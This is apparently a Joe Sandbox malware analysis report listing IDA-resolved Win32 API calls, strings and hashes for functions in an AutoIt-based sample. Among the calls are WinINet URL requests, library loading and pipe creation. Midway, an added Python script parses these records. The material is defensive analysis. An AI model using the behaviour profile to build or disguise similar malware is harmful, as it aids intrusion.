                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: 05f49148579488228b7203b7739354fccb2898eb20da3480d77f9638dd13c7e2
                                                                  • Instruction ID: 1f48a3b588a202bd3152856643c8f57ba3eb93cfdc6a263c77b4b5613741d37a
                                                                  • Opcode Fuzzy Hash: 05f49148579488228b7203b7739354fccb2898eb20da3480d77f9638dd13c7e2
                                                                  • Instruction Fuzzy Hash: 9CF0BE3715C602EBD7111B64EC4CADA7729FF84302F400131F617A10A2CF761880DB60
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0094899D
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 009489A9
                                                                  • CloseHandle.KERNEL32(?), ref: 009489B2
                                                                  • CloseHandle.KERNEL32(?), ref: 009489BA
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009489C3
                                                                  • HeapFree.KERNEL32(00000000), ref: 009489CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: ff82bad7230ed0118fc8486467443c33c94a2ebf5360361cd0f17408fe4f6ae0
                                                                  • Instruction ID: 5cf3b0715bdbd99b44cc56bf3e21279185e3696ae9d3721eaff394367dadee99
                                                                  • Opcode Fuzzy Hash: ff82bad7230ed0118fc8486467443c33c94a2ebf5360361cd0f17408fe4f6ae0
                                                                  • Instruction Fuzzy Hash: 09E0527711C505FBDA011FF5EC1C95ABB69FB89762B508631F21DA2470CB3294A1EB60
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00968613
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00968722
                                                                  • VariantClear.OLEAUT32(?), ref: 0096889A
                                                                    • Part of subcall function 00957562: VariantInit.OLEAUT32(00000000), ref: 009575A2
                                                                    • Part of subcall function 00957562: VariantCopy.OLEAUT32(00000000,?), ref: 009575AB
                                                                    • Part of subcall function 00957562: VariantClear.OLEAUT32(00000000), ref: 009575B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: da61fdece928f255fb274f25cdc5c7839ab1b4c51e2da0dc0ac34b3f2d7c32b5
                                                                  • Instruction ID: 9d926308894912cb7711e3721ed46215bf6507f24e13bee0991fb31dcfefdf77
                                                                  • Opcode Fuzzy Hash: da61fdece928f255fb274f25cdc5c7839ab1b4c51e2da0dc0ac34b3f2d7c32b5
                                                                  • Instruction Fuzzy Hash: 57918A716083059FC710DF28C48496BBBE8FF89714F14892EF99A9B361DB31E945CB92
                                                                  APIs
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                  • _memset.LIBCMT ref: 00952B87
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00952BB6
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00952C69
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00952C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: b0a6579d3c70cbf69219271006b486772c9962a3255f072b2afdd1f62a2d71f7
                                                                  • Instruction ID: f8ec2c19aa146942f58081f66981249724ce865abed10bb03f638c5f25149250
                                                                  • Opcode Fuzzy Hash: b0a6579d3c70cbf69219271006b486772c9962a3255f072b2afdd1f62a2d71f7
                                                                  • Instruction Fuzzy Hash: 1A51CE716083009AD724DF2AD845A6FB7E8EF9A321F040A6DFCD5E62D2DB70CD489752
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0094D5D4
                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0094D60A
                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0094D61B
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0094D69D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                  • String ID: DllGetClassObject
                                                                  • API String ID: 753597075-1075368562
                                                                  • Opcode ID: 0a40c7895f6063a323517bbfa76d1e0f0934536151e5cf3f0ec5162b59098fa2
                                                                  • Instruction ID: c950233cd0564253724e1613412ab10753ed3b98ee79615ec36ffcb6f517811c
                                                                  • Opcode Fuzzy Hash: 0a40c7895f6063a323517bbfa76d1e0f0934536151e5cf3f0ec5162b59098fa2
                                                                  • Instruction Fuzzy Hash: CA4191B5602204EFDB15DF64C884F9ABBA9EF85314F1681A9EC099F205D7B1DE44CBA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 009527C0
                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009527DC
                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00952822
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B5890,00000000), ref: 0095286B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: 98e89b442b962c73a714146740271cec1dcdcce7804d7e33ff2f5005bba832df
                                                                  • Instruction ID: 97478ec02d27464dfda47446f19bb2d1aa5eb2729ebb615bee9762e65b9017d8
                                                                  • Opcode Fuzzy Hash: 98e89b442b962c73a714146740271cec1dcdcce7804d7e33ff2f5005bba832df
                                                                  • Instruction Fuzzy Hash: AE41B0712083419FD720DF66D884F2ABBE8EF86315F04492DFAA5972D1D730E809CB62
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0096D7C5
                                                                    • Part of subcall function 008F784B: _memmove.LIBCMT ref: 008F7899
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower_memmove
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 3425801089-567219261
                                                                  • Opcode ID: e882b0ec511139fd5307ce9e4628488202c53e476662aaee6953e748600ed064
                                                                  • Instruction ID: 4522b9c99339495ff74580e8ea0e757351e041408ef415b71996d3e0f37d2ab6
                                                                  • Opcode Fuzzy Hash: e882b0ec511139fd5307ce9e4628488202c53e476662aaee6953e748600ed064
                                                                  • Instruction Fuzzy Hash: 3631C171A04609ABCF00EF68CD559FEB7B4FF55320B108A29E835976D1DB71AD05CB80
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 0094AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0094AABC
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00948F14
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00948F27
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00948F57
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 365058703-1403004172
                                                                  • Opcode ID: 419a6cc39927ced748895f1d8d4002ca25e8c4d9459ab654aa27ad551b132465
                                                                  • Instruction ID: 880cdb98c96ff1b7eece153cb569a8564656dd04d83281722649a88edb973e7d
                                                                  • Opcode Fuzzy Hash: 419a6cc39927ced748895f1d8d4002ca25e8c4d9459ab654aa27ad551b132465
                                                                  • Instruction Fuzzy Hash: 7A213571A04108BEEB14ABB4DC8ADFFB76DEF46324F104929F525A71E0DF39484AD650
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0096184C
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00961872
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009618A2
                                                                  • InternetCloseHandle.WININET(00000000), ref: 009618E9
                                                                    • Part of subcall function 00962483: GetLastError.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 00962498
                                                                    • Part of subcall function 00962483: SetEvent.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 009624AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3113390036-3916222277
                                                                  • Opcode ID: 9fa78190eedc16f125091d8d50d369e39e0480eebc75236f3701115e5c5fd6e9
                                                                  • Instruction ID: 5b3f1c1399d9193c7e3db72a4bb07c1e11869ec234b91e48b9e00ad49b10552a
                                                                  • Opcode Fuzzy Hash: 9fa78190eedc16f125091d8d50d369e39e0480eebc75236f3701115e5c5fd6e9
                                                                  • Instruction Fuzzy Hash: AA218EB2504208BFEB119B64DC85FBB77EDEB88745F14412AF809A7240EA249D45ABA1
                                                                  APIs
                                                                    • Part of subcall function 008F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008F1D73
                                                                    • Part of subcall function 008F1D35: GetStockObject.GDI32(00000011), ref: 008F1D87
                                                                    • Part of subcall function 008F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008F1D91
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00976461
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00976468
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0097647D
                                                                  • DestroyWindow.USER32(?), ref: 00976485
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: 747c021b44ad3dec8fdfc25c9d3b5ee6dfd7768ea5d1cab74befc36762d0299d
                                                                  • Instruction ID: fc0f83968f984c9023599d5882a1f52706519778b9ec6cd2c4c1787512ed8b3b
                                                                  • Opcode Fuzzy Hash: 747c021b44ad3dec8fdfc25c9d3b5ee6dfd7768ea5d1cab74befc36762d0299d
                                                                  • Instruction Fuzzy Hash: 8C21AE72210A09BFEF104F64DC90EBB37ADEF59368F108629FA18930A0D731DC81A760
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00956DBC
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00956DEF
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00956E01
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00956E3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: f0754275ef3228c21bc330ae6017d72260fba18a949124b66c22247127fd3de8
                                                                  • Instruction ID: 7b16b02b8beb48df06ceaa659bdd4df8ce3278839bfd4003a766cdb957ab1fff
                                                                  • Opcode Fuzzy Hash: f0754275ef3228c21bc330ae6017d72260fba18a949124b66c22247127fd3de8
                                                                  • Instruction Fuzzy Hash: 06219275600209ABDB20DF2ADC05B9A7BF8EF84722F604A29FDA0D72D0D7709958DB50
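The records above list, per function, the Win32 calls the IDA plugin resolved (direct calls and "Part of subcall function" entries), the call-site addresses, and a "$"-joined list of referenced strings. The following parser for that record format is an added example, not part of the Joe Sandbox report or its tooling: it splits the listing at each "APIs" heading, separates direct calls from subcall entries, splits the "String ID" field back into individual strings, and decodes the access, share and creation-disposition arguments of the CreateFileW(nul, ...) call in the record directly above. The embedded input is copied from this page (the WinINet record and the CreatePipe/CreateFileW record) with the Memory Dump Source lines trimmed; the constant names used for the CreateFileW arguments are the documented Win32 values.

```python
import re

# Constructed input: two function records copied from the report listing above,
# with the Memory Dump Source / IDA Plugin detail lines trimmed.
SAMPLE_REPORT = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0096184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00961872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009618A2
• InternetCloseHandle.WININET(00000000), ref: 009618E9
  • Part of subcall function 00962483: GetLastError.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 00962498
  • Part of subcall function 00962483: SetEvent.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 009624AD
Strings
Memory Dump Source
Joe Sandbox IDA Plugin
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 9fa78190eedc16f125091d8d50d369e39e0480eebc75236f3701115e5c5fd6e9
• Instruction Fuzzy Hash: AA218EB2504208BFEB119B64DC85FBB77EDEB88745F14412AF809A7240EA249D45ABA1
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00956DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00956DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00956E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00956E3B
Strings
Memory Dump Source
Joe Sandbox IDA Plugin
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: f0754275ef3228c21bc330ae6017d72260fba18a949124b66c22247127fd3de8
• Instruction Fuzzy Hash: 06219275600209ABDB20DF2ADC05B9A7BF8EF84722F604A29FDA0D72D0D7709958DB50
"""

# One API entry: optional subcall prefix, Name.MODULE, optional (args), ", ref: ADDR".
# CRT entries such as "_memset.LIBCMT ref: ..." carry no argument list, hence the optional group.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s?(?P<value>.*?)\s*$")
SECTION_HEADINGS = ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


def parse_records(text):
    """Return one dict per function record; a record starts at each 'APIs' heading."""
    records, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"apis": [], "fields": {}}
            records.append(current)
            section = "apis"
            continue
        if current is None:
            continue
        if stripped in SECTION_HEADINGS:
            section = stripped
            continue
        if section == "apis":
            m = API_LINE.match(line)
            if m:
                args = m.group("args")
                current["apis"].append({
                    "name": m.group("name"),
                    "module": m.group("module"),
                    "args": args.split(",") if args else [],
                    "ref": int(m.group("ref"), 16),   # call-site address as an int
                    "subcall": m.group("sub"),        # None for a direct call
                })
        elif section == "Similarity":
            m = FIELD_LINE.match(line)
            if m:
                current["fields"][m.group("key")] = m.group("value")
    return records


def direct_calls(record):
    """'MODULE!Name' for each call made directly by the function, in listing order."""
    return [f'{a["module"]}!{a["name"]}' for a in record["apis"] if a["subcall"] is None]


def record_strings(record):
    """The report joins referenced strings with '$'; split them back into a list."""
    raw = record["fields"].get("String ID", "")
    return raw.split("$") if raw else []


_ACCESS = ((0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL"))
_SHARE = ((1, "FILE_SHARE_READ"), (2, "FILE_SHARE_WRITE"), (4, "FILE_SHARE_DELETE"))
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_createfile(call):
    """Name the dwDesiredAccess, dwShareMode and dwCreationDisposition arguments of a CreateFileW entry."""
    args = call["args"]
    access, share, disposition = int(args[1], 16), int(args[2], 16), int(args[4], 16)
    return {
        "path": args[0],
        "access": [n for bit, n in _ACCESS if access & bit],
        "share": [n for bit, n in _SHARE if share & bit],
        "disposition": _DISPOSITION.get(disposition, hex(disposition)),
    }


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        print(rec["fields"].get("Opcode ID", "?")[:16], direct_calls(rec), record_strings(rec))
```

Run against the full function listing (the records between each "APIs" heading and its "Instruction Fuzzy Hash" line), the parser gives a per-function call list that can be grouped by module, so that every function touching WININET, ADVAPI32 or PSAPI can be pulled out for review without reading the whole listing; direct calls and subcall entries stay distinguishable, which matters because a subcall line belongs to a callee, not to the function the record describes.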
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00956E89
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00956EBB
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00956ECC
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00956F06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 40e3f2a79f090fc7adcad94816ed645a7443ca34d8c77d053dbda33e63029e2e
                                                                  • Instruction ID: 4f949b7ce459a535819b92168138ef3cefff8f1e6399507eca7ebd4606275a83
                                                                  • Opcode Fuzzy Hash: 40e3f2a79f090fc7adcad94816ed645a7443ca34d8c77d053dbda33e63029e2e
                                                                  • Instruction Fuzzy Hash: 5A21C4755013059BDB20DF6ADC05AAA77A8EF45721F600A19FDE0E32D0D7709868C750
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095AC54
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0095ACA8
                                                                  • __swprintf.LIBCMT ref: 0095ACC1
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0097F910), ref: 0095ACFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: b4ea55d85c02215b30705b81b88f91e73f104f81a6c1db58c779df5853b47655
                                                                  • Instruction ID: 4eeaa6e52fffa03f866458fc6d81765b58c30ffab9a81d4a762a2872d2a12367
                                                                  • Opcode Fuzzy Hash: b4ea55d85c02215b30705b81b88f91e73f104f81a6c1db58c779df5853b47655
                                                                  • Instruction Fuzzy Hash: 47217F31A0010DAFCB10DF69D945EAE7BB8FF89314B0040A9F909EB252DB31EA45DB61
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00951B19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
